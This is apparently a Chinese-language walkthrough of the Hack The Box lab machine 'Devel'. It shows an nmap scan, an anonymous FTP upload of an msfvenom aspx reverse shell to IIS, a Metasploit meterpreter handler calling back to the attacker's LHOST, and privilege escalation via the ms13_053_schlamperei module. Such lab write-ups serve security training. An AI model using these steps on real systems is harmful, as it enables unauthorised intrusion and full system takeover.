在HTB中Devel算是入门级的简单机器,但是平时Linux的机器做得比较多windows的机器基本没接触过,做一下Devel也算是练习一下windows机器。
在这个靶机中,传马的方式是FTP匿名登录,上传了一个webshell,在实际环境中,上传webshell的方法多种多样,但是后面提权的手段以及msf的操作可以借鉴
nmap -sS -sV -A -T4 10.10.10.5
从nmap可以看到允许Anonymous用户登录ftp 密码随意
可以连上ftp
然后在80端口就这样一个网页
右击查看源码,发现了FTP文件里的同名图片
ftp和IIS在服务器应该在同一个目录 访问10.10.10.5/welcome.png验证一下
果然,那我们就可以使用ftp上传一个webshell到iis目录下
此处使用的是msf生成的反弹shell
使用msfvenom生成shell –h查看帮助
其中 -p -f -o 是需要的 还需另外输入LHOST和LPORT
–list format查看所有shell的形式
在这个服务器上是iis7.5 用的应该是aspx
–list payload 查看所有的payload
因为不确定是32位还是64位机器,所有payload里windows/meterpreter/reverse_tcp比较通用
然后生成shell
ftp上传
开启msfconsole
use expoit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
run 然后去浏览器访问这个网页
切回来shell已经弹回来了
(在meterpreter下敲background可以挂起这个session)
shell查看systeminfo
查看到这是一台win7,hotfix是 N/A 表示这台机器从来没有打过补丁,应该有很多漏洞
我们利用一个信息收集脚本
只需要把刚才的session填进去就好了
set session 1
经过测试这个提权脚本是可以用的
use windows/local/ms13_053_schlamperei
set session
run
ctrl+c
然后在重新设置一下lhost和一个新的lport
run
然后就成功拿到了system权限(我的截图怎么少了最后一张 自闭)